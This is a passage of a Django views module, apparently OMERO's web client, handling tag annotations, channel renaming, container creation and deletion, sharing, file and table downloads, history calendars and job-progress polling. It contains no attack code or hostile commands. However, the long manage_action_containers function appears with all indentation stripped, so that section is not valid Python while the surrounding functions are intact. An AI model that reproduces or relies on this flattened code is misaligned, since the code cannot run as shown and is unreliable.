            # tags newly checked in the form vs. tags unchecked (to unlink)
            tags = [tag for tag in post_tags if tag not in selected_tag_ids]
            removed = [tag for tag in selected_tag_ids if tag not in post_tags]
            manager = BaseContainer(conn)
            if tags:
                manager.createAnnotationsLinks("tag", tags, oids)
            new_tags = []
            for form in newtags_formset.forms:
                new_tags.append(
                    manager.createTagAnnotations(
                        form.cleaned_data["tag"],
                        form.cleaned_data["description"],
                        oids,
                        tag_group_id=form.cleaned_data["tagset"],
                    )
                )
            # only remove Tags where the link is owned by self_id
            for remove in removed:
                tag_manager = BaseContainer(conn, tag=remove)
                tag_manager.remove(
                    [
                        "%s-%s" % (dtype, obj.id)
                        for dtype, objs in oids.items()
                        for obj in objs
                    ],
                    tag_owner_id=self_id,
                )
            return JsonResponse({"added": tags, "removed": removed, "new": new_tags})
        else:
            # TODO: handle invalid form error
            return HttpResponse(str(form_tags.errors))
    else:
        form_tags = TagsAnnotationForm(initial=initial)
        newtags_formset = NewTagsAnnotationFormSet(prefix="newtags")
    context = {
        "form_tags": form_tags,
        "newtags_formset": newtags_formset,
        "selected_tags": selected_tags,
    }
    template = "webclient/annotations/tags_form.html"
    context["template"] = template
    return context
@require_POST
@login_required()
@render_response()
def edit_channel_names(request, imageId, conn=None, **kwargs):
    """
    Edit and save channel names.

    Names come from POST parameters "channel0", "channel1", ... .
    If "confirm_apply" is posted, the names are applied to every image in
    the parent container given by "parentId" (e.g. "dataset-123" or
    "plate-123"); otherwise only to this image.
    """
    image = conn.getObject("Image", imageId)
    sizeC = image.getSizeC()
    channelNames = {}
    nameDict = {}
    for i in range(sizeC):
        cname = request.POST.get("channel%d" % i, None)
        if cname is not None:
            cname = smart_str(cname)[:255]  # Truncate to fit in DB
            channelNames["channel%d" % i] = cname
            nameDict[i + 1] = cname
    # BUGFIX: 'counts' was previously unbound (UnboundLocalError) when
    # 'confirm_apply' was posted without a 'parentId'; initialise it so
    # that case falls through to the error return below.
    counts = None
    # If the 'Apply to Dataset' button was used to submit...
    if request.POST.get("confirm_apply", None) is not None:
        # plate-123 OR dataset-234
        parentId = request.POST.get("parentId", None)
        if parentId is not None:
            ptype = parentId.split("-")[0].title()
            pid = long(parentId.split("-")[1])
            counts = conn.setChannelNames(ptype, [pid], nameDict, channelCount=sizeC)
    else:
        counts = conn.setChannelNames("Image", [image.getId()], nameDict)
    rv = {"channelNames": channelNames}
    if counts:
        rv["imageCount"] = counts["imageCount"]
        rv["updateCount"] = counts["updateCount"]
        return rv
    else:
        return {"error": "No parent found to apply Channel Names"}
@login_required(setGroupContext=True)
@render_response()
def manage_action_containers(
request, action, o_type=None, o_id=None, conn=None, **kwargs
):
"""
Handles many different actions on various objects.
@param action: "addnewcontainer", (creates a new Project, Dataset,
Screen), "editname", "savename", "editdescription",
"savedescription", (used as GET and POST for in-line
editing),
"removefromshare", (tree P/D/I moving etc)
"delete", "deletemany" (delete objects)
"remove" (remove tag/comment from object)
@param o_type: "dataset", "project", "image", "screen", "plate",
"acquisition", "well","comment", "file", "tag",
"tagset","share", "sharecomment"
"""
template = None
manager = None
if o_type in (
"dataset",
"project",
"image",
"screen",
"plate",
"acquisition",
"well",
"comment",
"file",
"tag",
"tagset",
):
kw = {}
if o_type is not None and int(o_id) > 0:
o_id = int(o_id)
kw[str(o_type)] = o_id
try:
manager = BaseContainer(conn, **kw)
except AttributeError as x:
return handlerInternalError(request, x)
elif o_type in ("share", "sharecomment", "chat"):
manager = BaseShare(conn, o_id)
else:
manager = BaseContainer(conn)
form = None
if action == "addnewcontainer":
# Used within the jsTree to add a new Project, Dataset, Tag,
# Tagset etc under a specified parent OR top-level
if not request.method == "POST":
return JsonResponse(
{"Error": "Must use POST to create container"}, status=405
)
form = ContainerForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Create new in %s: %s" % (o_type, str(form.cleaned_data)))
name = form.cleaned_data["name"]
description = form.cleaned_data["description"]
owner = form.cleaned_data["owner"]
if o_type == "project" and hasattr(manager, o_type) and o_id > 0:
oid = manager.createDataset(name, description, owner=owner)
elif o_type == "tagset" and o_id > 0:
oid = manager.createTag(name, description, owner=owner)
elif request.POST.get("folder_type") in (
"project",
"screen",
"dataset",
"tag",
"tagset",
):
# No parent specified. We can create orphaned 'project',
# 'dataset' etc.
folder_type = request.POST.get("folder_type")
if folder_type == "dataset":
oid = manager.createDataset(
name,
description,
owner=owner,
img_ids=request.POST.getlist("image", None),
)
else:
oid = conn.createContainer(
folder_type, name, description, owner=owner
)
else:
return HttpResponseServerError("Object does not exist")
rdict = {"bad": "false", "id": oid}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.items():
d.update({e[0]: unicode(e[1])})
rdict = {"bad": "true", "errs": d}
return JsonResponse(rdict)
elif action == "add":
template = "webclient/public/share_form.html"
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
if o_type == "share":
img_ids = request.GET.getlist("image", request.POST.getlist("image"))
if request.method == "GET" and len(img_ids) == 0:
return HttpResponse("No images specified")
images_to_share = list(conn.getObjects("Image", img_ids))
if request.method == "POST":
form = BasketShareForm(
initial={"experimenters": experimenters, "images": images_to_share},
data=request.POST.copy(),
)
if form.is_valid():
images = form.cleaned_data["image"]
message = form.cleaned_data["message"]
expiration = form.cleaned_data["expiration"]
members = form.cleaned_data["members"]
# guests = request.POST['guests']
enable = form.cleaned_data["enable"]
host = "%s?server=%i" % (
request.build_absolute_uri(
reverse("load_template", args=["public"])
),
int(conn.server_id),
)
shareId = manager.createShare(
host, images, message, members, enable, expiration
)
return HttpResponse("shareId:%s" % shareId)
else:
initial = {
"experimenters": experimenters,
"images": images_to_share,
"enable": True,
"selected": request.GET.getlist("image"),
}
form = BasketShareForm(initial=initial)
template = "webclient/public/share_form.html"
context = {"manager": manager, "form": form}
elif action == "edit":
# form for editing Shares only
if o_id is None:
raise Http404("No share ID")
if o_type == "share" and int(o_id) > 0:
template = "webclient/public/share_form.html"
manager.getMembers(o_id)
manager.getComments(o_id)
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
initial = {
"message": manager.share.message,
"expiration": "",
"shareMembers": manager.membersInShare,
"enable": manager.share.active,
"experimenters": experimenters,
}
if manager.share.getExpireDate() is not None:
initial["expiration"] = manager.share.getExpireDate().strftime(
"%Y-%m-%d"
)
form = ShareForm(initial=initial) # 'guests':share.guestsInShare,
context = {"manager": manager, "form": form}
elif action == "save":
# Handles submission of the 'edit' form above. TODO: not used now?
if not request.method == "POST":
return HttpResponseRedirect(
reverse("manage_action_containers", args=["edit", o_type, o_id])
)
if o_type == "share":
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
form = ShareForm(
initial={"experimenters": experimenters}, data=request.POST.copy()
)
if form.is_valid():
logger.debug("Update share: %s" % (str(form.cleaned_data)))
message = form.cleaned_data["message"]
expiration = form.cleaned_data["expiration"]
members = form.cleaned_data["members"]
# guests = request.POST['guests']
enable = form.cleaned_data["enable"]
host = "%s?server=%i" % (
request.build_absolute_uri(
reverse("load_template", args=["public"])
),
int(conn.server_id),
)
manager.updateShareOrDiscussion(
host, message, members, enable, expiration
)
r = "enable" if enable else "disable"
return HttpResponse(r)
else:
template = "webclient/public/share_form.html"
context = {"share": manager, "form": form}
else:
return HttpResponseServerError("Object does not exist")
elif action == "editname":
# start editing 'name' in-line
if hasattr(manager, o_type) and o_id > 0:
obj = getattr(manager, o_type)
template = "webclient/ajax_form/container_form_ajax.html"
if o_type == "tag":
txtValue = obj.textValue
else:
txtValue = obj.getName()
form = ContainerNameForm(initial={"name": txtValue})
context = {"manager": manager, "form": form}
else:
return HttpResponseServerError("Object does not exist")
elif action == "savename":
# Save name edit in-line
if not request.method == "POST":
return HttpResponseRedirect(
reverse("manage_action_containers", args=["edit", o_type, o_id])
)
if hasattr(manager, o_type) and o_id > 0:
form = ContainerNameForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Update name form:" + str(form.cleaned_data))
name = form.cleaned_data["name"]
rdict = {"bad": "false", "o_type": o_type}
manager.updateName(o_type, name)
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.items():
d.update({e[0]: unicode(e[1])})
rdict = {"bad": "true", "errs": d}
return JsonResponse(rdict)
else:
return HttpResponseServerError("Object does not exist")
elif action == "editdescription":
# start editing description in-line
if hasattr(manager, o_type) and o_id > 0:
obj = getattr(manager, o_type)
template = "webclient/ajax_form/container_form_ajax.html"
form = ContainerDescriptionForm(initial={"description": obj.description})
context = {"manager": manager, "form": form}
else:
return HttpResponseServerError("Object does not exist")
elif action == "savedescription":
# Save editing of description in-line
if not request.method == "POST":
return HttpResponseServerError(
"Action '%s' on the '%s' id:%s cannot be complited"
% (action, o_type, o_id)
)
if hasattr(manager, o_type) and o_id > 0:
form = ContainerDescriptionForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Update name form:" + str(form.cleaned_data))
description = form.cleaned_data["description"]
manager.updateDescription(o_type, description)
rdict = {"bad": "false"}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.items():
d.update({e[0]: unicode(e[1])})
rdict = {"bad": "true", "errs": d}
return JsonResponse(rdict)
else:
return HttpResponseServerError("Object does not exist")
elif action == "remove":
# Handles removal of comment, tag from
# Object etc.
# E.g. image-123 or image-1|image-2
parents = request.POST["parent"]
try:
manager.remove(parents.split("|"))
except Exception as x:
logger.error(traceback.format_exc())
rdict = {"bad": "true", "errs": str(x)}
return JsonResponse(rdict)
rdict = {"bad": "false"}
return JsonResponse(rdict)
elif action == "removefromshare":
image_id = request.POST.get("source")
try:
manager.removeImage(image_id)
except Exception as x:
logger.error(traceback.format_exc())
rdict = {"bad": "true", "errs": str(x)}
return JsonResponse(rdict)
rdict = {"bad": "false"}
return JsonResponse(rdict)
elif action == "delete":
# Handles delete of a file attached to object.
child = toBoolean(request.POST.get("child"))
anns = toBoolean(request.POST.get("anns"))
try:
handle = manager.deleteItem(child, anns)
request.session["callback"][str(handle)] = {
"job_type": "delete",
"delmany": False,
"did": o_id,
"dtype": o_type,
"status": "in progress",
"error": 0,
"dreport": _formatReport(handle),
"start_time": datetime.datetime.now(),
}
request.session.modified = True
except Exception as x:
logger.error(
"Failed to delete: %r" % {"did": o_id, "dtype": o_type}, exc_info=True
)
rdict = {"bad": "true", "errs": str(x)}
else:
rdict = {"bad": "false"}
return JsonResponse(rdict)
elif action == "deletemany":
# Handles multi-delete from jsTree.
object_ids = {
"Image": request.POST.getlist("image"),
"Dataset": request.POST.getlist("dataset"),
"Project": request.POST.getlist("project"),
"Annotation": request.POST.getlist("tag"),
"Screen": request.POST.getlist("screen"),
"Plate": request.POST.getlist("plate"),
"Well": request.POST.getlist("well"),
"PlateAcquisition": request.POST.getlist("acquisition"),
}
child = toBoolean(request.POST.get("child"))
anns = toBoolean(request.POST.get("anns"))
logger.debug(
"Delete many: child? %s anns? %s object_ids %s" % (child, anns, object_ids)
)
try:
for key, ids in object_ids.items():
if ids is not None and len(ids) > 0:
handle = manager.deleteObjects(key, ids, child, anns)
if key == "PlateAcquisition":
key = "Plate Run" # for nicer user message
dMap = {
"job_type": "delete",
"start_time": datetime.datetime.now(),
"status": "in progress",
"error": 0,
"dreport": _formatReport(handle),
"dtype": key,
}
if len(ids) > 1:
dMap["delmany"] = len(ids)
dMap["did"] = ids
else:
dMap["delmany"] = False
dMap["did"] = ids[0]
request.session["callback"][str(handle)] = dMap
request.session.modified = True
except Exception:
logger.error(
"Failed to delete: %r" % {"did": ids, "dtype": key}, exc_info=True
)
# Ajax error handling will allow user to submit bug report
raise
else:
rdict = {"bad": "false"}
return JsonResponse(rdict)
context["template"] = template
return context
@login_required(doConnectionCleanup=False)
def get_original_file(request, fileId, download=False, conn=None, **kwargs):
    """
    Serve the specified OriginalFile as a streamed http response.

    Used for displaying text or png/jpeg etc. files in the browser;
    with download=True the response is sent as an attachment.
    """
    # May be viewing results of a script run in a different group, so
    # query across all groups.
    conn.SERVICE_OPTS.setOmeroGroup(-1)
    original = conn.getObject("OriginalFile", fileId)
    if original is None:
        message = "Original File does not exist (id:%s)." % (fileId)
        return handlerInternalError(request, message)
    # Stream the file in chunks; the response cleans up the connection
    # once fully read.
    response = ConnCleaningHttpResponse(
        original.getFileInChunks(buf=settings.CHUNK_SIZE)
    )
    response.conn = conn
    content_type = original.mimetype
    if content_type == "text/x-python":
        content_type = "text/plain"  # allows display in browser
    response["Content-Type"] = content_type
    response["Content-Length"] = original.getSize()
    if download:
        # Spaces and commas would break the unquoted header value.
        attachment_name = original.name.replace(" ", "_").replace(",", ".")
        response["Content-Disposition"] = "attachment; filename=%s" % attachment_name
    return response
@login_required(doConnectionCleanup=False)
@render_response()
def omero_table(request, file_id, mtype=None, conn=None, **kwargs):
    """
    Download OMERO.table as CSV (streaming response) or return as HTML or json

    GET parameters 'query' (default "*"), 'offset' and 'limit' control
    which rows are returned.

    @param file_id: OriginalFile ID
    @param mtype: None for html table or 'csv' or 'json'
    @param conn: BlitzGateway connection
    """
    query = request.GET.get("query", "*")
    offset = get_long_or_default(request, "offset", 0)
    limit = get_long_or_default(request, "limit", settings.PAGE)
    # iviewer may not be installed; link is optional in the html template
    iviewer_url = None
    try:
        iviewer_url = reverse("omero_iviewer_index")
    except NoReverseMatch:
        pass
    # Check if file exists since _table_query() doesn't check
    # NOTE: 'long' here relies on the python-future/py2-compat builtins
    # used elsewhere in this module.
    file_id = long(file_id)
    orig_file = conn.getObject("OriginalFile", file_id)
    if orig_file is None:
        raise Http404("OriginalFile %s not found" % file_id)
    # For csv we fetch rows lazily so they can be streamed below
    lazy = mtype == "csv"
    context = webgateway_views._table_query(
        request, file_id, conn=conn, query=query, offset=offset, limit=limit, lazy=lazy
    )
    if context.get("error") or not context.get("data"):
        return JsonResponse(context)
    # OR, return as csv or html
    if mtype == "csv":
        table_data = context.get("data")
        def csv_gen():
            # Header row first, then batches of rows from the lazy iterator
            csv_cols = ",".join(table_data.get("columns"))
            yield csv_cols
            for rows in table_data.get("lazy_rows"):
                yield (
                    "\n" + "\n".join([",".join([str(d) for d in row]) for row in rows])
                )
        downloadName = orig_file.name.replace(" ", "_").replace(",", ".")
        downloadName = downloadName + ".csv"
        # TableClosingHttpResponse closes the OMERO.table once streaming ends
        rsp = TableClosingHttpResponse(csv_gen(), content_type="text/csv")
        rsp.conn = conn
        rsp.table = context.get("table")
        rsp["Content-Type"] = "application/force-download"
        # rsp['Content-Length'] = ann.getFileSize()
        rsp["Content-Disposition"] = "attachment; filename=%s" % downloadName
        return rsp
    context["data"]["name"] = orig_file.name
    context["data"]["path"] = orig_file.path
    context["data"]["id"] = file_id
    context["meta"]["query"] = query
    # check if offset matches an integer page number:
    if offset == 0 or offset / limit == offset // limit:
        context["meta"]["page"] = (offset // limit) + 1 if offset > 0 else 1
    # pagination links
    url = reverse("omero_table", args=[file_id])
    context["meta"]["url"] = url
    url += "?limit=%s" % limit
    if query != "*":
        url += "&query=%s" % query
    if (offset + limit) < context["meta"]["totalCount"]:
        context["meta"]["next"] = url + "&offset=%s" % (offset + limit)
    if offset > 0:
        context["meta"]["prev"] = url + "&offset=%s" % (max(0, offset - limit))
    # by default, return context as JSON data
    if mtype is None:
        context["template"] = "webclient/annotations/omero_table.html"
        context["iviewer_url"] = iviewer_url
        # Column indices let the template render object links
        col_types = context["data"]["column_types"]
        if "ImageColumn" in col_types:
            context["image_column_index"] = col_types.index("ImageColumn")
        if "WellColumn" in col_types:
            context["well_column_index"] = col_types.index("WellColumn")
        if "RoiColumn" in col_types:
            context["roi_column_index"] = col_types.index("RoiColumn")
        # provide example queries - pick first DoubleColumn...
        for idx, c_type in enumerate(col_types):
            if c_type in ("DoubleColumn", "LongColumn"):
                col_name = context["data"]["columns"][idx]
                # find first few non-empty cells...
                vals = []
                for row in context["data"]["rows"]:
                    if row[idx]:
                        vals.append(row[idx])
                    if len(vals) > 3:
                        break
                if " " in col_name or len(vals) < 2:
                    # Don't support queries on columns with spaces
                    continue
                context["example_column"] = col_name
                context["example_min_value"] = min(vals)
                context["example_max_value"] = max(vals)
                break
    return context
@login_required(doConnectionCleanup=False)
def download_annotation(request, annId, conn=None, **kwargs):
    """
    Return the file annotation content as an http response for download.

    @param annId: FileAnnotation ID
    @param conn: BlitzGateway connection (injected by @login_required)
    """
    ann = conn.getObject("FileAnnotation", annId)
    if ann is None:
        return handlerInternalError(
            request, "FileAnnotation does not exist (id:%s)." % (annId)
        )
    rsp = ConnCleaningHttpResponse(ann.getFileInChunks(buf=settings.CHUNK_SIZE))
    rsp.conn = conn
    rsp["Content-Type"] = "application/force-download"
    rsp["Content-Length"] = ann.getFileSize()
    # Sanitize the filename the same way get_original_file() does: spaces
    # AND commas break the unquoted Content-Disposition value in some
    # browsers, so replace both.
    downloadName = ann.getFileName().replace(" ", "_").replace(",", ".")
    rsp["Content-Disposition"] = "attachment; filename=%s" % downloadName
    return rsp
@login_required()
def download_orig_metadata(request, imageId, conn=None, **kwargs):
    """Serve the image's 'Original Metadata' as a downloadable text file."""
    image = conn.getObject("Image", imageId)
    if image is None:
        raise Http404("No Image found with ID %s" % imageId)
    metadata = image.loadOriginalMetadata()
    # Build the two key=value sections line by line.
    lines = ["[Global Metadata]"]
    for kv in metadata[1]:
        lines.append("%s=%s" % (kv[0], kv[1]))
    lines.append("[Series Metadata]")
    for kv in metadata[2]:
        lines.append("%s=%s" % (kv[0], kv[1]))
    body = "\n".join(lines)
    rsp = HttpResponse(body)
    rsp["Content-Type"] = "application/force-download"
    rsp["Content-Length"] = len(body)
    rsp["Content-Disposition"] = "attachment; filename=Original_Metadata.txt"
    return rsp
@login_required()
@render_response()
def download_placeholder(request, conn=None, **kwargs):
    """
    Page displays a simple "Preparing download..." message and redirects to
    the 'url'.
    We construct the url and query string from request: 'url' and 'ids'.

    GET parameters: 'format' (optional, e.g. JPEG/PNG export), 'ids'
    (required, e.g. image-1|image-2) and 'name' (optional zip name).
    """
    format = request.GET.get("format", None)
    if format is not None:
        download_url = reverse("download_as")
        zipName = "Export_as_%s" % format
    else:
        download_url = reverse("archived_files")
        zipName = "OriginalFileDownload"
    targetIds = request.GET.get("ids")  # E.g. image-1|image-2
    defaultName = request.GET.get("name", zipName)  # default zip name
    defaultName = os.path.basename(defaultName)  # remove path
    if targetIds is None:
        raise Http404("No IDs specified. E.g. ?ids=image-1|image-2")
    ids = targetIds.split("|")
    fileLists = []
    fileCount = 0
    filesTotalSize = 0
    # If we're downloading originals, list original files so user can
    # download individual files.
    if format is None:
        imgIds = []
        # NOTE(review): wellIds is collected below but never used afterwards
        wellIds = []
        for i in ids:
            if i.split("-")[0] == "image":
                imgIds.append(i.split("-")[1])
            elif i.split("-")[0] == "well":
                wellIds.append(i.split("-")[1])
        images = []
        # Get images...
        if imgIds:
            images = list(conn.getObjects("Image", imgIds))
        if len(images) == 0:
            raise Http404("No images found.")
        # Have a list of files per fileset (or per image without fileset)
        fsIds = set()
        fileIds = set()
        for image in images:
            fs = image.getFileset()
            if fs is not None:
                # Make sure we've not processed this fileset before.
                if fs.id in fsIds:
                    continue
                fsIds.add(fs.id)
            files = list(image.getImportedImageFiles())
            fList = []
            for f in files:
                # De-duplicate files shared between images
                if f.id in fileIds:
                    continue
                fileIds.add(f.id)
                fList.append({"id": f.id, "name": f.name, "size": f.getSize()})
                filesTotalSize += f.getSize()
            if len(fList) > 0:
                fileLists.append(fList)
        fileCount = sum([len(fList) for fList in fileLists])
    else:
        # E.g. JPEG/PNG - 1 file per image
        fileCount = len(ids)
    # Turn e.g. 'image-1' into 'image=1' query args for the download view
    query = "&".join([_id.replace("-", "=") for _id in ids])
    download_url = download_url + "?" + query
    if format is not None:
        download_url = download_url + "&format=%s" % format
    context = {
        "template": "webclient/annotations/download_placeholder.html",
        "url": download_url,
        "defaultName": defaultName,
        "fileLists": fileLists,
        "fileCount": fileCount,
        "filesTotalSize": filesTotalSize,
    }
    # Warn in the UI rather than attempting an oversized zip
    if filesTotalSize > settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE:
        context["downloadTooLarge"] = settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE
    return context
@login_required(setGroupContext=True)
@render_response()
def load_calendar(request, year=None, month=None, conn=None, **kwargs):
    """
    Load the calendar displayed in the left panel of the history page.

    Shows the current month by default; entries are filtered by the
    experimenter id stored in the session.
    """
    filter_user_id = request.session.get("user_id")
    if year is not None and month is not None:
        controller = BaseCalendar(conn=conn, year=year, month=month, eid=filter_user_id)
    else:
        # No date given - default to today's month.
        today = datetime.datetime.today()
        controller = BaseCalendar(
            conn=conn, year=today.year, month=today.month, eid=filter_user_id
        )
    controller.create_calendar()
    return {
        "controller": controller,
        "template": "webclient/history/calendar.html",
    }
@login_required(setGroupContext=True)
@render_response()
def load_history(request, year, month, day, conn=None, **kwargs):
    """Load the data for a particular date into the history center panel."""
    if year is None or month is None or day is None:
        raise Http404("Year, month, and day are required")
    # current page of results
    page = int(request.GET.get("page", 1))
    filter_user_id = request.session.get("user_id")
    controller = BaseCalendar(
        conn=conn, year=year, month=month, day=day, eid=filter_user_id
    )
    controller.get_items(page)
    return {
        "controller": controller,
        "template": "webclient/history/history_details.html",
    }
def getObjectUrl(conn, obj):
    """
    Return a url to browse to the specified omero.model.ObjectI P/D/I,
    S/P, FileAnnotation etc.; used to display results from the scripting
    service, e.g. webclient/userdata/?path=image-12601
    If the object is a file annotation, try to browse to a parent P/D/I.
    """
    base_url = reverse(viewname="load_template", args=["userdata"])
    # A FileAnnotation itself can't be browsed to, so link to the first
    # parent Project/Dataset/Image we can find instead.
    if isinstance(obj, omero.model.FileAnnotationI):
        fa = conn.getObject("Annotation", obj.id.val)
        for ptype in ["project", "dataset", "image"]:
            links = list(fa.getParentLinks(ptype))
            if links:
                obj = links[0].parent
                break
    browsable = ("ImageI", "DatasetI", "ProjectI", "ScreenI", "PlateI", "WellI")
    if obj.__class__.__name__ in browsable:
        # Strip the trailing 'I' from e.g. 'ImageI' to get the show type
        otype = obj.__class__.__name__[:-1].lower()
        base_url += "?show=%s-%s" % (otype, obj.id.val)
    return base_url
######################
# Activities window & Progressbar
def update_callback(request, cbString, **kwargs):
    """Merge the given key/value pairs into one callback entry in the session."""
    request.session["callback"][cbString].update(kwargs)
@login_required()
@render_response()
def activities(request, conn=None, **kwargs):
    """
    This refreshes callback handles (delete, scripts, chgrp etc) and provides
    html to update Activities window & Progressbar.
    The returned html contains details for ALL callbacks in web session,
    regardless of their status.
    We also add counts of jobs, failures and 'in progress' to update status
    bar.

    A GET with 'jobId' polls a single chgrp/chown dry-run handle; a DELETE
    with a JSON body {'jobId': ...} cancels a running job.
    """
    in_progress = 0
    failure = 0
    new_results = []
    _purgeCallback(request)
    # If we have a jobId (not added to request.session) just process it...
    # ONLY used for chgrp/chown dry-run.
    jobId = request.GET.get("jobId", None)
    if jobId is not None:
        jobId = str(jobId)
        try:
            prx = omero.cmd.HandlePrx.checkedCast(conn.c.ic.stringToProxy(jobId))
            status = prx.getStatus()
            logger.debug("job status: %s", status)
            rsp = prx.getResponse()
            if rsp is not None:
                rv = graphResponseMarshal(conn, rsp)
                rv["finished"] = True
            else:
                rv = {"finished": False}
            rv["status"] = {
                "currentStep": status.currentStep,
                "steps": status.steps,
                "startTime": status.startTime,
                "stopTime": status.stopTime,
            }
        except IceException:
            # Handle is gone - treat as finished
            rv = {"finished": True}
        return rv
    elif request.method == "DELETE":
        try:
            json_data = json.loads(request.body)
        except TypeError:
            # for Python 3.5
            json_data = json.loads(bytes_to_native_str(request.body))
        jobId = json_data.get("jobId", None)
        if jobId is not None:
            jobId = str(jobId)
            rv = {"jobId": jobId}
            try:
                prx = omero.cmd.HandlePrx.checkedCast(conn.c.ic.stringToProxy(jobId))
                status = prx.getStatus()
                logger.debug("pre-cancel() job status: %s", status)
                rv["status"] = {
                    "currentStep": status.currentStep,
                    "steps": status.steps,
                    "startTime": status.startTime,
                    "stopTime": status.stopTime,
                }
                prx.cancel()
            except omero.LockTimeout:
                # expected that it will take > 5 seconds to cancel
                logger.info("Timeout on prx.cancel()")
            return rv
    # test each callback for failure, errors, completion, results etc
    for cbString in request.session.get("callback").keys():
        callbackDict = request.session["callback"][cbString]
        job_type = callbackDict["job_type"]
        status = callbackDict["status"]
        if status == "failed":
            failure += 1
        request.session.modified = True
        # update chgrp / chown
        if job_type in ("chgrp", "chown"):
            if status not in ("failed", "finished"):
                rsp = None
                try:
                    prx = omero.cmd.HandlePrx.checkedCast(
                        conn.c.ic.stringToProxy(cbString)
                    )
                    rsp = prx.getResponse()
                    close_handle = False
                    try:
                        # if response is None, then we're still in progress,
                        # otherwise...
                        if rsp is not None:
                            close_handle = True
                            new_results.append(cbString)
                            if isinstance(rsp, omero.cmd.ERR):
                                rsp_params = ", ".join(
                                    [
                                        "%s: %s" % (k, v)
                                        for k, v in rsp.parameters.items()
                                    ]
                                )
                                logger.error(
                                    "%s failed with: %s" % (job_type, rsp_params)
                                )
                                update_callback(
                                    request,
                                    cbString,
                                    status="failed",
                                    report="%s %s" % (rsp.name, rsp_params),
                                    error=1,
                                )
                            elif isinstance(rsp, omero.cmd.OK):
                                update_callback(request, cbString, status="finished")
                        else:
                            in_progress += 1
                    finally:
                        # close() with True also closes the server-side handle
                        prx.close(close_handle)
                except Exception:
                    logger.info(
                        "Activities %s handle not found: %s" % (job_type, cbString)
                    )
                    continue
        elif job_type == "send_email":
            if status not in ("failed", "finished"):
                rsp = None
                try:
                    prx = omero.cmd.HandlePrx.checkedCast(
                        conn.c.ic.stringToProxy(cbString)
                    )
                    callback = omero.callbacks.CmdCallbackI(
                        conn.c, prx, foreground_poll=True
                    )
                    rsp = callback.getResponse()
                    close_handle = False
                    try:
                        # if response is None, then we're still in progress,
                        # otherwise...
                        if rsp is not None:
                            close_handle = True
                            new_results.append(cbString)
                            if isinstance(rsp, omero.cmd.ERR):
                                rsp_params = ", ".join(
                                    [
                                        "%s: %s" % (k, v)
                                        for k, v in rsp.parameters.items()
                                    ]
                                )
                                logger.error("send_email failed with: %s" % rsp_params)
                                update_callback(
                                    request,
                                    cbString,
                                    status="failed",
                                    report={"error": rsp_params},
                                    error=1,
                                )
                            else:
                                # Success count plus any invalid recipients
                                total = (
                                    rsp.success
                                    + len(rsp.invalidusers)
                                    + len(rsp.invalidemails)
                                )
                                update_callback(
                                    request,
                                    cbString,
                                    status="finished",
                                    rsp={"success": rsp.success, "total": total},
                                )
                                if (
                                    len(rsp.invalidusers) > 0
                                    or len(rsp.invalidemails) > 0
                                ):
                                    invalidusers = [
                                        e.getFullName()
                                        for e in list(
                                            conn.getObjects(
                                                "Experimenter", rsp.invalidusers
                                            )
                                        )
                                    ]
                                    update_callback(
                                        request,
                                        cbString,
                                        report={
                                            "invalidusers": invalidusers,
                                            "invalidemails": rsp.invalidemails,
                                        },
                                    )
                        else:
                            in_progress += 1
                    finally:
                        callback.close(close_handle)
                except Exception:
                    logger.error(traceback.format_exc())
                    logger.info("Activities send_email handle not found: %s" % cbString)
        # update delete
        elif job_type == "delete":
            if status not in ("failed", "finished"):
                try:
                    handle = omero.cmd.HandlePrx.checkedCast(
                        conn.c.ic.stringToProxy(cbString)
                    )
                    cb = omero.callbacks.CmdCallbackI(
                        conn.c, handle, foreground_poll=True
                    )
                    rsp = cb.getResponse()
                    close_handle = False
                    try:
                        if not rsp:  # Response not available
                            update_callback(
                                request,
                                cbString,
                                error=0,
                                status="in progress",
                                dreport=_formatReport(handle),
                            )
                            in_progress += 1
                        else:  # Response available
                            close_handle = True
                            new_results.append(cbString)
                            rsp = cb.getResponse()
                            err = isinstance(rsp, omero.cmd.ERR)
                            if err:
                                update_callback(
                                    request,
                                    cbString,
                                    error=1,
                                    status="failed",
                                    dreport=_formatReport(handle),
                                )
                                failure += 1
                            else:
                                update_callback(
                                    request,
                                    cbString,
                                    error=0,
                                    status="finished",
                                    dreport=_formatReport(handle),
                                )
                    finally:
                        cb.close(close_handle)
                except Ice.ObjectNotExistException:
                    # Handle already gone - assume the delete completed
                    update_callback(
                        request, cbString, error=0, status="finished", dreport=None
                    )
                except Exception as x:
                    logger.error(traceback.format_exc())
                    logger.error("Status job '%s'error:" % cbString)
                    update_callback(
                        request, cbString, error=1, status="failed", dreport=str(x)
                    )
                    failure += 1
        # update scripts
        elif job_type == "script":
            # if error on runScript, the cbString is not a ProcessCallback...
            if not cbString.startswith("ProcessCallback"):
                continue  # ignore
            if status not in ("failed", "finished"):
                logger.info("Check callback on script: %s" % cbString)
                try:
                    proc = omero.grid.ScriptProcessPrx.checkedCast(
                        conn.c.ic.stringToProxy(cbString)
                    )
                except IceException:
                    update_callback(
                        request,
                        cbString,
                        status="failed",
                        Message="No process found for job",
                        error=1,
                    )
                    continue
                cb = omero.scripts.ProcessCallbackI(conn.c, proc)
                # check if we get something back from the handle...
                if cb.block(0):  # ms.
                    cb.close()
                    try:
                        # we can only retrieve this ONCE - must save results
                        results = proc.getResults(0, conn.SERVICE_OPTS)
                        update_callback(request, cbString, status="finished")
                        new_results.append(cbString)
                    except Exception:
                        update_callback(
                            request,
                            cbString,
                            status="finished",
                            Message="Failed to get results",
                        )
                        logger.info("Failed on proc.getResults() for OMERO.script")
                        continue
                    # value could be rstring, rlong, robject
                    rMap = {}
                    for key, value in results.items():
                        v = value.getValue()
                        if key in ("stdout", "stderr", "Message"):
                            if key in ("stderr", "stdout"):
                                # just save the id of original file
                                v = v.id.val
                            update_kwargs = {key: v}
                            update_callback(request, cbString, **update_kwargs)
                        else:
                            if hasattr(v, "id"):
                                # do we have an object (ImageI,
                                # FileAnnotationI etc)
                                obj_data = {
                                    "id": v.id.val,
